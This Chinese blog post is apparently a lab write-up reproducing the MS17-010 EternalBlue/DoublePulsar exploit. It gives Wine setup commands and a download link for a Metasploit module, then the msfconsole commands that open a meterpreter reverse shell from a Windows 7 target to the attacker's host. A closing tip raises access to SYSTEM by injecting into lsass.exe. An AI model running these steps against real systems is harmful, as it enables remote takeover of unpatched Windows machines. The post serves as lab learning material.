ms17-010 exp复现

  • A+
所属分类:网络安全

前言

Shadow Brokers公布的文件需要win32位+python2.6+pywin32环境,利用起来有很多设置,略显麻烦,正好t00ls有相关的exp和利用过程,我就写了这篇文章记录我自己的一个复现过程。

0x00 创建wine

kali 64位

kali 64位需要兼容32位环境才可以使用,执行以下命令来安装32位运行库

'dpkg --add-architecture i386
apt-get update
apt-get install lib32z1 lib32ncurses5
apt-get install wine32
wine cmd.exe'

kali 32位

直接执行
'wine cmd.exe'即可

ms17-010 exp复现

0x01修改exp

  1. 下载exp:https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/

  2. 解压文件将其中的deps文件夹和eternalblue_doublepulsar.rb复制到/usr/share/metasploit-framework/modules/exploits/windows/smb/下,我在这里将eternalblue_doublepulsar.rb重命名为ms17_010_smb_RCE.rb,方便以后的查找利用。

  3. 修改rb文件
    ms17-010 exp复现

0x02 复现

攻击机:kali 192.168.1.108

靶 机:win7 64位 旗舰版 sp1(关闭防火墙)

MSF使用就很简单了,下面列出主要的命令

'use exploit/windows/smb/ms17_010_smb_RCE
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.108
set rhost 192.168.1.107
set target 9
set targetarchitecture x64
exploit'

附效果图
ms17-010 exp复现

0x03 结语

本人菜鸟,记录的都是很简单的一些东西,大牛绕过就可以了,谢谢,欢迎交流。md语法也是一边百度一边用,可能排版不好,请见谅。

参考链接:https://www.t00ls.net/thread-39584-1-1.html

纠正

按照上面的攻击过程获取到的权限一般都是local service \ network service,无法进行提权。问题出现在PROCESSINJECT(注入进程)的设置上。上文中注入的进程是svchost.exe,我们查看进程可以发现svchost.exe有多个进程,分别有local service \ network service \ system三种权限。
ms17-010 exp复现

这也就难怪获得的权限是local service \ network service。
我们只需将注入进程修改为system / admin权限的进程就OK,例如explorer.exe、lsass.exe等等。为了以后使用方便,我直接修改文件。
ms17-010 exp复现

或者你可以每次利用时set PROCESSINJECT 进程名 设置即可。
ms17-010 exp复现

下面是获取到system权限的效果图
ms17-010 exp复现

End

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: